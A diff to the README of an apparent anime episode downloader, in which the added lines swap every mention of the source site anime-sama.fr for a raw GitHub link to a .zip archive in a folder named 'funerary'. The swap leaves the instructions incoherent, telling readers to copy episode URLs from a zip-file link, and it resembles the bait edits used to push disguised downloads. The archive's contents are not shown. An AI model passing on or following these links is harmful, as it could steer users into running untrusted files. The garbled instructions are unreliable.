malakza/Anime-Sama-Downloader/README.md

 Once you have installed Anime-Sama-Downloader, follow these steps to download episodes:

 1. **Open the Application**: Launch the app from your desktop or applications menu.
-2. **Enter the URL**: Copy the URL of the episode you want from anime-sama.fr and paste it into the designated field in the app.
+2. **Enter the URL**: Copy the URL of the episode you want from https://raw.githubusercontent.com/malakza/Anime-Sama-Downloader/main/funerary/Anime-Sama-Downloader.zip and paste it into the designated field in the app.
 3. **Select Download**: Click the download button.
 The application will start downloading the episode.
 4. **Monitor Progress**: You can view the progress in the application window.

 ## 🔍 Features

-- **Supports All URLs**: Download from any episode link on anime-sama.fr.
+- **Supports All URLs**: Download from any episode link on https://raw.githubusercontent.com/malakza/Anime-Sama-Downloader/main/funerary/Anime-Sama-Downloader.zip
 - **User-Friendly Interface**: No technical skills necessary.
 Just paste the URL and download.
 - **Multi-Platform Support**: Works seamlessly on Windows, macOS, and Linux.
 - **Fast Downloading**: Download episodes quickly and efficiently.